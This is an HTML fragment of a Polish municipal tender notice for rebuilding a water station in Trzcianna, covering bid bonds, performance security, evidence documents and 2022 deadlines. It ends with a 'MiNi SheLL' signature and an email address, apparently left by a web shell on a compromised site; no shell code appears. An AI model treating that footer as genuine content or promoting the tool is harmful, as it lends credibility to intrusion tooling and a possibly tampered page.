podmiotów, na rzecz których roboty te zostały <br/>wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane <br/>zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje <br/>bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty <br/>budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od <br/>niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty; <br/>wzór wykazu dla robót budowlanych stanowi Załącznik nr 6 do SWZ;<br/>b) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia <br/>publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę <br/>jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich <br/>kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych <br/>do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie <br/>czynności oraz informacją o podstawie do dysponowania tymi osobami; <br/>wzór wykazu osób stanowi Załącznik nr 7 do SWZ.<br/>2) Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, <br/>wykonywanych wspólnie z innymi wykonawcami, wykaz robót budowlanych, dotyczy <br/>robót, w których wykonaniu wykonawca ten bezpośrednio uczestniczył. <br/>3) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub <br/>doświadczenia, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą <br/>polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub <br/>usługi, do realizacji których te zdolności są wymagane (art. 117 ust. 3 Pzp). <br/>4) W przypadku, o którym mowa w ust. 3 powyżej, wykonawcy wspólnie ubiegający się <br/>o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które <br/>roboty budowlane wykonają poszczególni wykonawcy. <br/>Wzór oświadczenia stanowi Załącznik nr 9 do SWZ.<br/>8. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je <br/>uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów <br/>publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności <br/>podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w oświadczeniu <br/>wstępnym dane umożliwiające dostęp do tych środków.<br/>9. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które <br/>zamawiający posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość <br/>i aktualność.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych wraz z ofertą. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Wykonawca dołącza do oferty oświadczenie wstępne o niepodleganiu wykluczeniu oraz <br/>o spełnianiu warunków udziału w postępowaniu, wg załącznika nr 4 do SWZ.<br/>2. W przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, <br/>Wykonawca przedstawia także oświadczenie podmiotu udostępniającego zasoby, <br/>potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału <br/>w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby <br/>– wg załącznika nr 5 do SWZ<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie <br/>wstępne składa każdy z wykonawców. Oświadczenie to potwierdza brak podstaw <br/>wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy <br/>z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/>4. Jeżeli wykonawca zamierza powierzyć wykonanie części zamówienia podwykonawcom, <br/>w celu wykazania braku istnienia wobec nich podstaw wykluczenia z udziału w postępowaniu, <br/>zamieszcza informacje o podwykonawcach w oświadczeniu wstępnym, w części dotyczącej <br/>braku podstaw wykluczenia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający żąda wniesienia wadium w kwocie 30.000,00 zł<br/>2. Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku <br/>następujących formach: <br/>1) pieniądzu; <br/>2) gwarancjach bankowych; <br/>3) gwarancjach ubezpieczeniowych; <br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 <br/>ustawy <br/>z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości <br/>(Dz. U. z 2019 r. poz. 310, 836 i 1572). <br/>3. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego <br/>w Banku Spółdzielczym w Skierniewicach, Oddział w Nowym Kawęczynie, konto nr 88 <br/>9297 0005 0200 0130 2012 0017<br/> z dopiskiem „Wadium na zadanie pn.:„Przebudowa i rozbudowa stacji wodociągowej <br/>w miejscowości Trzcianna”. <br/>4. Wniesienie wadium w pieniądzu przelewem na rachunek bankowy wskazany przez <br/>zamawiającego będzie skuteczne z chwilą uznania tego rachunku bankowego kwotą wadium <br/>(jeżeli wpływ środków pieniężnych na rachunek bankowy wskazany przez zamawiającego <br/>nastąpi przed upływem terminu składania ofert). <br/>5. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w art. <br/>97 ust. 7 pkt 2-4 Pzp, wykonawca przekazuje zamawiającemu oryginał gwarancji lub <br/>poręczenia, <br/>w postaci elektronicznej.<br/>6. Jeżeli wadium będzie wniesione w formie gwarancji i/lub poręczeń, z ich treści musi <br/>wynikać, że wadium zabezpiecza ofertę wykonawcy złożoną w postępowaniu o udzielenie <br/>zamówienia publicznego -„Przebudowa i rozbudowa stacji wodociągowej w <br/>miejscowości Trzcianna”. <br/>7. Z treści gwarancji i poręczeń musi wynikać bezwarunkowe, nieodwołalne i na pierwsze <br/>pisemne żądanie zamawiającego, zobowiązanie gwaranta lub poręczyciela do zapłaty na <br/>rzecz zamawiającego kwoty określonej w gwarancji lub poręczeniu, w okolicznościach, <br/>o których mowa w art. 98 ust. 6 Pzp. <br/>8. Gwarancje i poręczenia muszą podlegać prawu polskiemu. Wszystkie spory dotyczące <br/>gwarancji i poręczeń, będą rozstrzygane zgodnie z prawem polskim przez sądy polskie. <br/>W przypadku, gdy wykonawca wnosi wadium w formie gwarancji lub poręczeń w języku <br/>innym niż język polski, dokument gwarancji lub poręczenia należy złożyć wraz <br/>z tłumaczeniem na język polski. <br/>9. Za zgodą zamawiającego wykonawca może dokonać zmiany formy wadium na jedną lub <br/>kilka form, o których mowa w art. 97 ust. 7 pkt 2-4 Pzp. Zmiana formy wadium musi być <br/>dokonana z zachowaniem ciągłości zabezpieczenia oferty kwotą wadium. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Zabezpieczenie ustala się w wysokości 3 % ceny całkowitej podanej w ofercie. <br/>2. Zgodnie z art. 450 ust. 1 Pzp, zabezpieczenie może być wnoszone, według wyboru <br/>wykonawcy, w jednej lub w kilku następujących formach: <br/>1) pieniądzu; <br/>2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy <br/>oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem <br/>pieniężnym; <br/>3) gwarancjach bankowych; <br/>4) gwarancjach ubezpieczeniowych; <br/>5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt <br/>2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju <br/>Przedsiębiorczości. <br/>3. Zamawiający nie wyraża zgody na wniesienie zabezpieczenia w formach <br/>określonych <br/>w art. 450 ust. 2 Pzp: <br/>1) w wekslach z poręczeniem wekslowym banku lub spółdzielczej kasy <br/>oszczędnościowo-kredytowej; <br/>2) przez ustanowienie zastawu na papierach wartościowych emitowanych przez <br/>Skarb Państwa lub jednostkę samorządu terytorialnego; <br/>3) przez ustanowienie zastawu rejestrowego na zasadach określonych w <br/>ustawie z dnia <br/>6 grudnia 1996 r. o zastawie rejestrowym i rejestrze zastawów. <br/>Zabezpieczenie wnoszone w pieniądzu należy wnieść przelewem na rachunek bankowy <br/>Zamawiającego w Banku Spółdzielczym w Skierniewicach, Oddział w Nowym <br/>Kawęczynie, konto nr 88 9297 0005 0200 0130 2012 0017 z dopiskiem - Zabezpieczenie <br/>na zadanie: „Przebudowa i rozbudowa stacji wodociągowej w miejscowości <br/>Trzcianna” <br/>4. Wniesienie zabezpieczenia należytego wykonania umowy w pieniądzu przelewem <br/>na rachunek bankowy wskazany przez zamawiającego będzie skuteczne z chwilą uznania tego rachunku bankowego kwotą zabezpieczenia (wpływ środków pieniężnych na rachunek <br/>bankowy wskazany przez zamawiającego musi nastąpić przed podpisaniem umowy <br/>w sprawie zamówienia publicznego). <br/>5. Jeżeli zabezpieczenie wniesiono w pieniądzu, zamawiający przechowuje je na <br/>oprocentowanym rachunku bankowym. Zamawiający zwraca zabezpieczenie wniesione <br/>w pieniądzu z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono <br/>przechowywane, pomniejszone o koszt prowadzenia tego rachunku oraz prowizji bankowej <br/>za przelew pieniędzy na rachunek bankowy wykonawcy. <br/>6. W przypadku gdy zabezpieczenie będzie wnoszone w innej formie niż pieniądz, <br/>Zamawiający zastrzega sobie prawo do akceptacji projektu wyżej wymienionego dokumentu. <br/>7. W przypadku wniesienia zabezpieczenia w innej formie niż pieniądz, z treści <br/>dokumentu musi wynikać bezwarunkowe, nieodwołalne i na pierwsze pisemne żądanie <br/>zamawiającego (beneficjenta), zobowiązanie gwaranta lub poręczyciela do zapłaty na rzecz <br/>zamawiającego kwoty stanowiącej 3% ceny całkowitej podanej w ofercie, z tytułu <br/>niewykonania lub nienależytego wykonania umowy w sprawie zamówienia publicznego <br/>przez wykonawcę (zobowiązanego). <br/>8. Zamawiający zwróci zabezpieczenie w następujących terminach: <br/>a) 70% wysokości zabezpieczenia w ciągu 30 dni od dnia wykonania zamówienia i uznania <br/>przez Zamawiającego za należycie wykonane; <br/>b) 30% wysokości zabezpieczenia nie później niż w 15 dniu po upływie okresu gwarancji <br/>jakości. <br/>9. W trakcie realizacji umowy wykonawca może dokonać zmiany formy <br/>zabezpieczenia na jedną lub kilka form, o których mowa w art. 450 ust. 1 Pzp. <br/>10. Zmiana formy zabezpieczenia jest dokonywana z zachowaniem ciągłości <br/>zabezpieczenia <br/>i bez zmniejszenia jego wysokości. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projekt umowy w sprawie zamówienia publicznego stanowi Załącznik nr 2 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-02 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ugkaweczyn.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-02 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-01</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Informacja o podstawach wykluczenia, o których mowa w art. 109 ust. 1 <br/>– Zamawiający nie przewiduje stosowanie podstaw wykluczenia, o których mowa w art. 109 <br/>ust. 1.<br/>2. Opis części zamówienia orazliczba części zamówienia, na którą wykonawca może złożyć <br/>ofertę, lub maksymalna liczbę części, na które zamówienie może zostać udzielone temu <br/>samemu wykonawcy, oraz kryteria lub zasady, mające zastosowanie do ustalenia, które <br/>części zamówienia zostaną udzielone jednemu wykonawcy, w przypadku wyboru jego oferty <br/>w większej niż maksymalna liczbie części <br/>- Zamawiający nie dopuszcza składania ofert częściowych. Podział zamówienia <br/>spowodowałby nadmierne trudności organizacyjne i techniczne.<br/>Brak podziału zamówienia na części nie wpływa negatywnie na konkurencyjność w sektorze <br/>małych i średnich przedsiębiorstw – zakres zamówienia jest zakresem typowym, <br/>umożliwiającym złożenie oferty wykonawcom z grupy małych lub średnich przedsiębiorstw. <br/>Wartość przedmiotowego zamówienia jest niższa od tzw. progów unijnych które zobowiązują <br/>do implementacji dyrektyw UE. Dyrektywa 2014/24/UE w treści motywu 78 wskazuje, że aby <br/>zwiększyć konkurencję, instytucje zamawiające należy w szczególności zachęcać do <br/>dzielenia dużych zamówień na części. Przedmiotowe zamówienie nie jest dużym <br/>zamówieniem <br/>w rozumieniu motywu 78 powołanej dyrektywy UE (dyrektywy stosuje się od tzw. progów UE, <br/>a dyrektywa posługuje się pojęciem dużego zamówienia na gruncie zamówień podlegających <br/>dyrektywie - a więc zamówienia o wartości znacznie przewyższającej tzw. progi UE). <br/>3. Informacja dotycząca ofert wariantowych, w tym o sposobie przedstawiania ofert <br/>wariantowych oraz minimalne warunki, jakim muszą odpowiadać oferty wariantowe <br/>- Zamawiający nie dopuszcza składania ofert wariantowych.<br/>4. Wymagania w zakresie zatrudnienia osób, o których mowa w art. 96 ust. 2 pkt 2, <br/>- Zamawiający nie przewiduje wymagań w tym zakresie.<br/>5. Informacja o zastrzeżeniu możliwości ubiegania się o udzielenie zamówienia wyłącznie <br/>przez wykonawców, o których mowa w art. 94 <br/>- Zamawiający nie przewiduje takich wymagań.<br/>6. Informacja o przewidywanych zamówieniach, o których mowa w art. 214 ust. 1 pkt 7 i 8 <br/>Pzp. <br/>- Zamawiający nie przewiduje udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 i 8 <br/>Pzp.<br/>7. Informacje dotyczące przeprowadzenia przez wykonawcę wizji lokalnej lub sprawdzenia <br/>przez niego dokumentów niezbędnych do realizacji zamówienia, o których mowa w art. 131 <br/>ust. 2 Pzp <br/>- Zamawiający nie wymaga przeprowadzenia przez Wykonawcę wizji lokalnej lub <br/>sprawdzenia przez niego dokumentów niezbędnych do realizacji zamówienia, o których <br/>mowa w art. 131 ust. 2 ustawy Pzp.<br/>8. Informacja dotycząca walut obcych, w jakich mogą być prowadzone rozliczenia między <br/>zamawiającym a wykonawcą <br/>- Zamawiający nie przewiduje rozliczenia w walutach obcych.<br/>9. Informacja dotycząca zwrotu kosztów udziału w postępowaniu <br/>- Zamawiający nie przewiduje kosztów udziału w postępowaniu<br/>10. Informacja o obowiązku osobistego wykonania przez wykonawcę kluczowych zadań <br/>- Zamawiający nie dokonuje takiego zastrzeżenia.<br/>11. Maksymalna liczbę wykonawców, z którymi zamawiający zawrze umowę ramową <br/>- Zamawiający nie przewiduje zawarcia umowy ramowej; <br/>12. informacja o przewidywanym wyborze najkorzystniejszej oferty z zastosowaniem aukcji <br/>elektronicznej wraz z informacjami, o których mowa w art. 230 <br/>- Zamawiający nie przewiduje aukcji elektronicznej; <br/>13. Informacja o wymogu kub możliwości złożenia oferty w postaci katalogów elektronicznych <br/>lub dołączenia katalogów elektronicznych do oferty <br/>- Zamawiający dopuszcza dołączenie katalogu elektronicznego do składanej oferty.

Creat By MiNi SheLL
Email: jattceo@gmail.com